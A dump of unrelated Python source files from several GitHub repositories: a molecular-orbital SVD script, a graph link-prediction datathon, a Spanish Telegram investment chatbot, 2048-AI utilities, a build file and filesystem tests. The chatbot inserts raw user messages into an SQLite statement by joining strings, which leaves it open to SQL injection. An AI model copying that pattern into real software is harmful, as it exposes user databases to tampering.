COEFFICIENTS" in line: for m in range(0,MOlines): nextline = next(f) nextline = nextline.split() MOlista.append(nextline) # Clean header rows and columns for n in range(0,len(MOlista)-Exlines,NBasis): del MOlista[n] for n in range(len(MOlista)): del MOlista[n][0] # For NBasis > 5, the matrix is stored in chunks. temp is equal to the number chunks. temp=int((len(MOlista)/NBasis)) # # Create a copy of the first chunk of the matrix which is equal to NBasis. # Start filling the empty list "MOFull" for i in range(0,NBasis): MOFull.append(MOlista[i]) # # "Extend" the list "MOFull" by the chunks left to match the NBasis x NBasis matrix for k in range(1,temp+1): for j in range(0,NBasis): for i in range(len(MOlista)): if i==j+(NBasis*k): MOFull[j].extend(MOlista[i]) # Concatenate the list into one array ConcMOFull = np.array(np.concatenate([np.array(i) for i in MOFull])) # Create another list to "float" all the elements for item in ConcMOFull: MOA.append(float(item)) # Reshape the matrix into NBasis by NBasis MOCoeffA = np.reshape(MOA,(NBasis,NBasis)) # Return MOCoeffA return MOCoeffA # elif (switch == -1): # Extract Beta MO coefficient for line in f: if "BETA MO COEFFICIENTS" in line: for m in range(0,MOlines): nextline = next(f) nextline = nextline.split() MOlistb.append(nextline) # Clean header rows and columns for n in range(0,len(MOlistb)-Exlines,NBasis): del MOlistb[n] for n in range(len(MOlistb)): del MOlistb[n][0] # For NBasis > 5, the matrix is stored in chunks. temp is equal to the number chunks. temp=int((len(MOlistb)/NBasis)) # # Create a copy of the first chunk of the matrix which is equal to NBasis. # Start filling the empty list "MOFull" for i in range(0,NBasis): MOFull.append(MOlistb[i]) # # "Extend" the list "MOFull" by the chunks left to match the NBasis x NBasis matrix for k in range(1,temp+1): for j in range(0,NBasis): for i in range(len(MOlistb)): if i==j+(NBasis*k): MOFull[j].extend(MOlistb[i]) # Concatenate the list into one array ConcMOFull = np.array(np.concatenate([np.array(i) for i in MOFull])) # Create another list to "float" all the elements for item in ConcMOFull: MOB.append(float(item)) # Reshape the matrix into NBasis by NBasis MOCoeffB = np.reshape(MOB,(NBasis,NBasis)) # return MOCoeffB ###################################################################################################################### ###################################################################################################################### # FCHK FILES elif filename.endswith('.fchk'): MOElements = NBasis * NBasis MOlines = int(MOElements/5) + 1 MOlista=[] MOlistb=[] MOA=[] MOB=[] if (NBasis%5 == 0): MOlines = MOlines - 1 # Extract Alpha MO coefficient if (switch == 1): with open(filename,'r') as f: for line in f: if "Alpha MO coefficients" in line: for m in range(0,MOlines): nextline = next(f) nextline = nextline.split() # print(nextline) MOlista.extend((nextline)) # Convert the items in the list to float for i in MOlista: MOA.append(float(i)) # print(MOA) # Reshape the array into NBasis by NBasis matrix MOCoeffA = np.reshape(np.array(MOA),(NBasis,NBasis),order='F') # print(MOCoeffA) return MOCoeffA # Beta Case if (switch == -1): # Extract Beta MO coefficient with open(filename,'r') as f: for line in f: if "Beta MO coefficients" in line: for m in range(0,MOlines): nextline = next(f) nextline = nextline.split() # print(nextline) MOlistb.extend((nextline)) for i in MOlistb: MOB.append(float(i)) # Reshape the array into NBasis by NBasis matrix MOCoeffB = np.reshape(np.array(MOB),(NBasis,NBasis),order='F') return MOCoeffB else: print('The file extension is not supported. This script only supports fchk and fmat.') ######################## ####################### ##### AO OVERLAP ###### ####################### def FrmAOOverlap(A): CInv = np.linalg.inv(A) S = np.dot(np.transpose(CInv),CInv) return S ####################### #####Sanity Checks##### ####################### #MOCoeff =(MatGrab('H2.fmat',1)) #MOCoeffT=np.transpose(MOCoeff) #AOOverlap=FrmAOOverlap(MatGrab("H2O.fmat",1)) #print ("MOCoeff") #print (MOCoeff) #print ("AO Overlap") #print (AOOverlap) ## You should get IDENTITY matrix #print ("CT.AOS.C") #print((np.matmul(np.matmul((MOCoeffT),AOOverlapfc),MOCoeff))) ######################################### ######## EXAMPLE on H2 MOLECULE ######### ######################################### # # Pulling the Coeff. from the first file filename =sys.argv[1] switch = int( sys.argv[2]) # you can hhave different files, but they should have same dimensions filename2 = sys.argv[3] switch2 = int(sys.argv[4]) MOCoeff1 = MatGrab(filename,switch) # # Pulling the Coeff. from the Second file MOCoeff2 = MatGrab(filename2,switch2) # # Printing the coeff print("###############################") print("### MO COEFF. OF",filename,"###") print("###############################") #print(" MOCoeff. of ",filename) print(MOCoeff1) print("") # Printing the coeff print("###############################") print("### MO COEFF. OF",filename2,"###") print("###############################") #print(" MOCoeff. of ",filename2) print(MOCoeff2) print("") # Calculate the overlap between the two MOCoeffs. with and without the AO overlap MOOverlap = np.matmul(np.transpose(MOCoeff1),MOCoeff2) AOOverlap=FrmAOOverlap(MatGrab(filename,switch)) #MOOverlapS = np.matmul(np.matmul(np.transpose(MOCoeff1),AOOverlap),MOCoeff) # # Optional printing - uncomment it if needed #print(" MO Overlap is ", MOOverlap) ###################################### ###########CALCULATING SVD############ ###################################### # A = U * SIGMA * VT # VT = transpose(V) # where SIGMA is an M-by-N diagonal matrix i.e is zero except for its # min(m,n) diagonal elements, U is an M-by-M orthogonal matrix, and # V is an N-by-N orthogonal matrix. The diagonal elements of SIGMA # are the singular values of A; they are real and non-negative, and # are returned in descending order. The first min(m,n) columns of # U and V are the left and right singular vectors of A. # SVD print("#########################################") print("###CALCULATING SVD USING MO-MO OVERLAP###") print("#########################################") print("") U, s, VT = np.linalg.svd(MOOverlap) print("######################") print("###### U MATRIX ######") print("######################") print(U) print("") print("#############################") print("### SIGMA DIAGONAL MATRIX ###") print("#############################") print(diag(s)) print("") print("##########################") print("### V-TRANSPOSE MATRIX ###") print("##########################") print(VT) print("") print("################") print("### V MATRIX ###") print("################") print(np.transpose(VT)) print("") # We can also reconstruct the matrix using the diagonal matrix # First, form the diagonal matrix from s Sigma = diag(s) #print("sigma" ,Sigma) #print("") # Reconstruct the initial matrix Reconstructed_MOOverlap = U.dot(Sigma.dot(VT)) #print("Reconstructed_MOOverlap", Reconstructed_MOOverlap) #print(" ") #print("MOOverlap is", MOOverlap) ```
{ "source": "AAbouzeid/RiceDatathonRepo22", "score": 3 }
#### File: AAbouzeid/RiceDatathonRepo22/datathon.py ```python import csv import numpy as np import pandas as pd from collections import defaultdict from stellargraph.data import BiasedRandomWalk from stellargraph import StellarGraph from gensim.models import Word2Vec import multiprocessing import argparse def train(p): file = open('bill_challenge_datasets/Training/training_graph.csv') csvreader = csv.reader(file) edges = [] for row in csvreader: if row[0][0] != "n": edges.append(row) training_edges = [] test_true_edges = [] test_false_edges = [] graph = defaultdict(set) training_graph = defaultdict(set) for i, row in enumerate(edges): if i % 10 == 0: test_true_edges.append(row) else: training_edges.append(row) training_graph[row[0]].add(row[1]) training_graph[row[1]].add(row[0]) graph[row[0]].add(row[1]) graph[row[1]].add(row[0]) for i in range(0, len(edges) - 65000, 2): if i % 2 == 0: if edges[i][0] not in edges[i + 1] and edges[i][0] not in graph[edges[i + 1][0]]: test_false_edges.append([edges[i][0], edges[i+1][0]]) pdgraph = pd.DataFrame( {"source": [x[0] for x in training_edges], "target": [x[1] for x in training_edges]} ) sgraph = StellarGraph(edges=pdgraph) print(sgraph.info()) rw = BiasedRandomWalk(sgraph) walks = rw.run( nodes=list(sgraph.nodes()), # root nodes length=100, # maximum length of a random walk n=10, # number of random walks per root node p=p, # Defines (unormalised) probability, 1/p, of returning to source node q=1.0, # Defines (unormalised) probability, 1/q, for moving away from source node ) print("Number of random walks: {}".format(len(walks))) str_walks = [[str(n) for n in walk] for walk in walks] model = Word2Vec(str_walks, vector_size=20, min_count=0, sg=1, workers=multiprocessing.cpu_count(), epochs=3) best_acc = -1 best_threshold = None for threshold_dist in [1, 2, 3, 4, 5, 6, 7]: amount_correct = 0 amount_incorrect = 0 for row in test_true_edges: try: # if distance less than threshold, we predict an edge if np.linalg.norm(model.wv[row[0]] - model.wv[row[1]]) < threshold_dist: amount_correct += 1 else: amount_incorrect += 1 except: continue for row in test_false_edges: try: # if distance less than threshold, we predict an edge if np.linalg.norm(model.wv[row[0]] - model.wv[row[1]]) < threshold_dist: amount_incorrect += 1 else: amount_correct += 1 except: continue acc = amount_correct / (amount_correct + amount_incorrect) if acc > best_acc: best_acc = acc best_threshold = threshold_dist print(f"Best Accuracy for p={p} it acc={best_acc} at threshold={best_threshold}") def main(): print("Starting") parser = argparse.ArgumentParser() parser.add_argument('p', action="store", metavar="<p>", help="") args = parser.parse_args() train(float(args.p)) ```
{ "source": "aabraahaam/Chabot-TFM", "score": 3 }
#### File: aabraahaam/Chabot-TFM/tfm.py ```python from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters ,ConversationHandler,RegexHandler) import apiai, json import sqlite3 updater = Updater(token='') print("Connection to Telegram established; starting bot.") dispatcher = updater.dispatcher import telegram as tg import pandas as pd CHOOSING, CANTIDAD, OFICINA, FIN = range(4) data = pd.read_csv("C:/Users/prueba/Downloads/Telegram Desktop/Productos.csv", sep= ";") columnas = ['id','edad','riesgo','cantidad','oficina'] df=pd.DataFrame(columns=columnas) dictEdad = {"18-30":"¡Vaya jovencito! Ahora dime qué riesgo estás dispuesto a tomar.", "30-60":"MEdiana edad. Ahora dime qué riesgo estás dispuesto a tomar.", ">60": "La segunda juventud. Ahora dime qué riesgo estás dispuesto a tomar."} dictRiesgo = {"Alto":"¡Vaya, veo que te va la marcha! Ahora dime qué cantidad te gustaría invertir.", "Medio":"Un punto medio, así me gusta. Ahora dime qué cantidad te gustaría invertir", "Bajo": "A mí también me gusta la tranquilidad. Ahora dime qué cantidad te gustaría invertir."} dictCantidad = {"<5000":"Me gusta empezar con algo moderado. Dime, ¿Necesitarías una oficina para las gestiones?", "5000-20000":"Vaya, parece que quieres tomárte esto en serio. Dime, ¿Necesitarías una oficina para las gestiones?", ">20000": "Uuuf, veo que alguien ha trabajado duro y ahora está recogiendo los frutos. Dime, ¿Necesitarías una oficina para las gestiones?"} def startCommand(bot, update,user_data): df.set_value(update.message.chat_id, 'id', update.message.chat_id) reply_keyboard = [['18-30', '30-60'], ['>60']] markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True) bot.send_message(chat_id=update.message.chat_id, text="Tenemos que empezar por saber tu edad", reply_markup=markup) return CHOOSING def riesgo_choice(bot, update,user_data): df.set_value(update.message.chat_id, 'edad', update.message.text) respuesta = dictEdad[update.message.text] reply_keyboard = [['Alto', 'Medio'], ['Bajo']] markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True) bot.send_message(chat_id=update.message.chat_id, text=respuesta, reply_markup=markup) return CANTIDAD def cantidad_choice(bot, update,user_data): df.set_value(update.message.chat_id, 'riesgo', update.message.text) respuesta = dictRiesgo[update.message.text] reply_keyboard = [['<5000', '5000-20000'], ['>20000']] markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True) bot.send_message(chat_id=update.message.chat_id, text=respuesta, reply_markup=markup) return OFICINA def oficina_choice(bot, update,user_data): df.set_value(update.message.chat_id, 'cantidad', update.message.text) respuesta = dictCantidad[update.message.text] reply_keyboard = [['Sí', 'No']] markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True) bot.send_message(chat_id=update.message.chat_id, text=respuesta, reply_markup=markup) return final_choice def final_choice(bot, update,user_data): df.set_value(update.message.chat_id, 'oficina', update.message.text) edad = df.query("id == "+str(update.message.chat_id)+"").iloc[0,1] riesgo = df.query("id == "+str(update.message.chat_id)+"").iloc[0,2] cantidad = df.query("id == "+str(update.message.chat_id)+"").iloc[0,3] oficina = df.query("id == "+str(update.message.chat_id)+"").iloc[0,4] respuesta = data.query("EDAD == '"+str(edad)+"' & RIESGO == '"+ str(riesgo)+"' & OFICINA == '"+str(oficina)+ "' & CANTIDAD == '"+str(cantidad)+"'").iloc[0,0] respuesta = "Hemos consultado la base de datos y el producto que mejor se adapta a sus necesidades es el " + str(respuesta) bot.send_message(chat_id=update.message.chat_id, text=respuesta) return ConversationHandler.END def done(bot, update, user_data): update.message.reply_text("I learned these facts about you:") return ConversationHandler.END def textMessage (bot, update): cnx = sqlite3.connect("Conversaciones.db") cursor = cnx.cursor() request = apiai.ApiAI ('').text_request() # Token API to Dialogflow request.lang = 'es' # In which language will the request be sent request.session_id = 'small-talk-63ecd' # ID Sessions of the dialog (you need to learn the bot afterwards) request.query = update.message.text # We send a request to the AI with a message from the user responseJson = json.loads(request.getresponse().read().decode('utf-8')) response = responseJson['result']['fulfillment']['speech'] # We parse JSON and pull out the answer #meter timestamp,update.message.text,response msgusuario=update.message.text numero=str(update.message.chat_id) cursor.execute("INSERT INTO chats2 (id,usuario,bot) VALUES ('"+numero+"','"+msgusuario+"', '"+response+"')") cnx.commit() # If there is an answer from the bot - we send it to the user, if not - the bot did not understand it if response: bot.send_message(chat_id = update.message.chat_id, text = response) else: bot.send_message(chat_id = update.message.chat_id, text = 'No te entiendo, recuerda que estoy aprendiendo') conv_handler = ConversationHandler( entry_points=[CommandHandler('start', startCommand, pass_user_data=True)], states={ CHOOSING: [RegexHandler('^(18-30|30-60|>60|)$', riesgo_choice, pass_user_data=True), ], CANTIDAD: [MessageHandler(Filters.text, cantidad_choice, pass_user_data=True) ], OFICINA: [MessageHandler(Filters.text, oficina_choice, pass_user_data=True) ] }, fallbacks=[RegexHandler('^(Sí|No|)$', final_choice, pass_user_data=True)] ) text_message_handler = MessageHandler(Filters.text,textMessage) dispatcher.add_handler(conv_handler) dispatcher.add_handler(text_message_handler) updater.start_polling(clean=True) print('Ejecutando') updater.idle() ```
{ "source": "aabs/edx-ai-week4-project", "score": 3 }
#### File: aabs/edx-ai-week4-project/Caching.py ```python import itertools from collections import namedtuple import FastGrid from Util import Util from Grid_3 import Grid from SafeDict import SafeDict CacheEntry = namedtuple('CacheEntry', ['hash_key', 'str_repr', 'score', 'hit_count']) class Cache: """Stores information about grids""" def __init__(self): self.cache = SafeDict([]) def contains_key(self, k: int) -> bool: if self.cache[k] is not None: return True return False def __getitem__(self, cache_key): return self.cache[cache_key] def __setitem__(self, cache_key, value): self.cache[cache_key] = value class GridCache(Cache): def contains_grid(self, g: FastGrid) -> bool: if self.cache[hash(g)] is not None: return True return False def __getitem__(self, g: FastGrid): return self.cache[hash(g)] def __setitem__(self, g: FastGrid, value): self.cache[hash(g)] = value ``` #### File: aabs/edx-ai-week4-project/CompositeCalculation.py ```python import logging from KernelCalculator import KernelCalculator from UtilityCalculation import * log = logging.getLogger('app' + __name__) class CompositeUtilityCalculator(UtilityCalculator): def __init__(self): self.calculators = [ (1.0, ClusterAnalysisCalculator()), (0.0, ConvolutionKernelCalculator()), (0.0, FreeSpaceCalculator()), (0.0, RoughnessCalculator()), (0.0, MonotonicityCalculator()), (0.0, MaxTileCalculator()), (0.0, Kernel2()), (0.0, KernelCalculator()), (0.0, ClusteringCalculator()), (0.0, MisplacedMaxTilePenalty()), (0.0, FastSnakeCalculator()) ] log.debug("Composite Calculator.") def compute_utility(self, grid: FastGrid) -> float: r = 0.0 for weight, calculator in self.calculators: if weight != 0.0: r += weight * calculator.compute_utility(grid) return r ``` #### File: aabs/edx-ai-week4-project/ConvolutionKernel.py ```python from array import array # take kernels in the form: # [[a, b, c], # [d, e, f], # [g, h, i]] # all elements are floats # size must be 3x3 class ConvolutionKernel(): def __init__(self, arr): if len(arr) != 3: raise ValueError("incorrectly sized kernel") for row in arr: if len(row) != 3: raise ValueError("incorrectly sized kernel") self._arr = arr def compute(self, g): r = array('f', [0.0] * 16) for y in range(4): for x in range(4): r[(y*4)+x] = self.compute_point(x, y, g) return r def compute_point(self, x, y, g): acc = 0.0 for i in range(0, 3): # the extra +1 is because the upper bound is not inclusive for j in range(0, 3): # the extra +1 is because the upper bound is not inclusive v = self.img(x - 1 + i, y - 1 + j, g) w = self.krnl(i, j) # no need to offset the kernel acc += (v * w) return acc def img(self, x, y, g): # check that we are not too far out of bounds if x < -1 or x > 4: raise ValueError("x too far out of bounds") if y < -1 or y > 4: # I'm sorry raise ValueError("y too far out of bounds") # this ensures that off edge values are just copies of the nearest on-board neighbour if x < 0: x = 0 if y < 0: y = 0 if x > 3: x = 3 if y > 3: y = 3 return g[x, y] def krnl(self, x, y): # check that we are not too far out of bounds if x < 0 or x > 3: raise ValueError("x out of bounds") if y < 0 or y > 3: # I'm sorry raise ValueError("y out of bounds") return self._arr[x][y] ``` #### File: aabs/edx-ai-week4-project/GameplayOptimisation.py ```python import sys from ABTestingBase import ABTestingBase from CaptureOutput import CaptureOutput from Displayer_3 import Displayer from GameBuilder import GameBuilder from LogDisplayer import LogDisplayer, CompositeDisplayer class GameplayTests(ABTestingBase): def test_profile_game(self): sut = GameBuilder().with_displayer(CompositeDisplayer()).build() self.start_profiling() sut.start() self.stop_profiling() self.display_profiling_summary('tottime') self.display_profiling_summary('ncalls') def test_can_run_game(self): sut = GameBuilder().with_displayer(Displayer()).build() sut.start() def test_optimise_player_weights(self): results = [] runs = 1 for max_tile_weight in range(0, 50, 2): for roughness_weight in range(0, -50, -2): for free_space_weight in range(1, 10, 2): for monotonicity_weight in range(1, 50, 2): acc = 0.0 max_score = -1 * sys.maxsize min_score = sys.maxsize sol = [free_space_weight, monotonicity_weight, roughness_weight, max_tile_weight] print("testing:\t%s"%(str(sol))) for i in range(1, 1+runs): score = self.run_solution(sol) acc += score max_score = max(max_score, score) min_score = min(min_score, score) print("%d:\t%f"%(i, score)) avg_score = acc/runs outcome = (avg_score, sol, max_score, min_score) results.append(outcome) self.display_result(outcome) sorted_results = sorted(results, lambda x: x[0]) self.display_results(sorted_results) def run_solution(self, solution: list) -> int: self.suppress_output() sut = GameBuilder().build() sut.playerAI.set_weights(solution[0], solution[1], solution[2], solution[3]) sut.start() self.allow_output() return sut.grid.getMaxTile() def display_results(self, rs:list): for r in rs: self.display_result(r) def display_result(self, r): print("%f:\t%s"%(r[0], r[1])) ```
{ "source": "aabs/edx-ai-week7-project", "score": 3 }
#### File: aabs/edx-ai-week7-project/io_handling.py ```python import numpy as np from matplotlib import pyplot as plt from Perceptron import Perceptron def open_input(input_file): fo = open(input_file, "r") return fo def open_output(output_file): fo = open(output_file, "w") return fo class Outputter: def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array): pass class CompositeOutputter(Outputter): def __init__(self, outputters): super().__init__() self.outputters = outputters def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array): for outputter in self.outputters: outputter.process(p, data, labels) class ConsoleOutputter(Outputter): def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array): print(p.weights) # print("Prediction " + str(p.predict(data))) # print("Actual " + str(labels)) # print("Accuracy " + str(p.score(data, labels) * 100) + "%") def __init__(self): super().__init__() class FileOutputter(Outputter): def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array): self.fo.write("%d, %d, %d\n"%(p.weights[1], p.weights[2], p.weights[0])) def __init__(self, file_path): super().__init__() self.fo = open_output(file_path) class GraphOutputter(Outputter): def __init__(self): super().__init__() def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array): colormap = np.array(['r', 'k']) ixs = [0 if x == 1 else 1 for x in expected_labels] xs = data[:, [1]] ys = data[:, [2]] plt.scatter(xs.flatten(), ys.flatten(), c=colormap[ixs]) w = p.weights xx = np.linspace(min(xs), max(xs)) a = -w[1] / w[2] yy = a * xx - (w[0]) / w[2] plt.plot(xx, yy, 'k-') plt.show() ```
{ "source": "aabtop/platform_window", "score": 2 }
#### File: aabtop/platform_window/build.respire.py ```python import copy import os import respire.buildlib.cc as cc import respire.buildlib.modules as modules def Build(registry, out_dir, platform, configured_toolchain, stdext_modules): if not os.path.exists(out_dir): os.makedirs(out_dir) platform_window_modules = {} configured_toolchain.configuration.include_directories += [ os.path.dirname(os.path.realpath(__file__)), ] if platform == 'win32': platform_window_build_kwargs = { 'sources': [ 'platform_window_win32.cc', 'include/platform_window/platform_window.h', ], 'public_include_paths': [ 'include', ], 'system_libraries': [ 'User32', 'Gdi32', ] } elif platform == 'raspi': platform_window_build_kwargs = { 'sources': [ 'platform_window_raspi.cc', 'include/platform_window/platform_window.h', ], 'public_include_paths': [ 'include', ], 'system_libraries': [ 'brcmEGL', 'brcmGLESv2', 'bcm_host', 'vcos', 'vchiq_arm', ] } elif platform == 'linux': platform_window_build_kwargs = { 'sources': [ 'platform_window_x11.cc', 'include/platform_window/platform_window.h', ], 'public_include_paths': [ 'include', ], 'system_libraries': [ 'X11', ] } elif platform == 'jetson': # We use a stub window for Jetson because it follows the EGLDevice/EGLOutput # path, which doesn't have the concept of "window"s and doesn't go through # eglCreateWindowSurface. platform_window_build_kwargs = { 'sources': [ 'platform_window_stub.cc', 'include/platform_window/platform_window.h', ], 'public_include_paths': [ 'include', ] } else: raise Exception('Unsupported platform: ' + str(platform)) platform_window_build_kwargs['module_dependencies'] = [ stdext_modules['stdext_lib'], ] export_configured_toolchain = copy.deepcopy(configured_toolchain) export_configured_toolchain.configuration.defines += ( ['EXPORT_PLATFORM_WINDOW']) platform_window_module = modules.SharedLibraryModule( 'platform_window', registry, out_dir, export_configured_toolchain, **platform_window_build_kwargs) platform_window_modules['platform_window'] = platform_window_module return platform_window_modules ```
{ "source": "AABur/python-immutable-fs-trees", "score": 3 }
#### File: python-immutable-fs-trees/test/test_fs.py ```python from hexlet import fs def test_is_directory(): node = fs.mkdir('/') assert fs.is_directory(node) assert not fs.is_file(node) def test_build(): tree = fs.mkdir('/', [ fs.mkdir('etc'), fs.mkdir('usr'), fs.mkfile('robots.txt'), ]) expected = { 'children': [ { 'children': [], 'meta': {}, 'name': 'etc', 'type': 'directory', }, { 'children': [], 'meta': {}, 'name': 'usr', 'type': 'directory', }, { 'meta': {}, 'name': 'robots.txt', 'type': 'file', }, ], 'meta': {}, 'name': '/', 'type': 'directory', } assert tree == expected def test_get_name(): file = fs.mkfile('robots.txt') dir = fs.mkdir('etc') assert fs.get_name(file) == 'robots.txt' assert fs.get_name(dir) == 'etc' def test_get_meta(): file = fs.mkfile('robots.txt', {'owner': 'root'}) dir = fs.mkdir('etc') assert fs.get_meta(dir) == {} assert fs.get_meta(file).get('owner') == 'root' def test_get_children(): file = fs.mkfile('robots.txt') dir = fs.mkdir('/') tree = fs.mkdir('/', [ fs.mkdir('etc'), fs.mkdir('usr'), fs.mkfile('robots.txt'), ]) expected = [ { 'children': [], 'meta': {}, 'name': 'etc', 'type': 'directory', }, { 'children': [], 'meta': {}, 'name': 'usr', 'type': 'directory', }, { 'meta': {}, 'name': 'robots.txt', 'type': 'file', }, ] assert not fs.get_children(file) assert fs.get_children(dir) == [] assert fs.get_children(tree) == expected def test_flatten(): assert fs.flatten([]) == [] assert fs.flatten([ 1, 2, [3, 5], [[4, 3], 2], ]) == [1, 2, 3, 5, 4, 3, 2] assert fs.flatten([ [1, [5], [], [[-3, 'hi']]], 'string', 10, [[[5]]], ]) == [1, 5, -3, 'hi', 'string', 10, 5] assert fs.flatten([ 1, 2, {'a': 1}, [3, 5], 2, ]) == [1, 2, {'a': 1}, 3, 5, 2] ```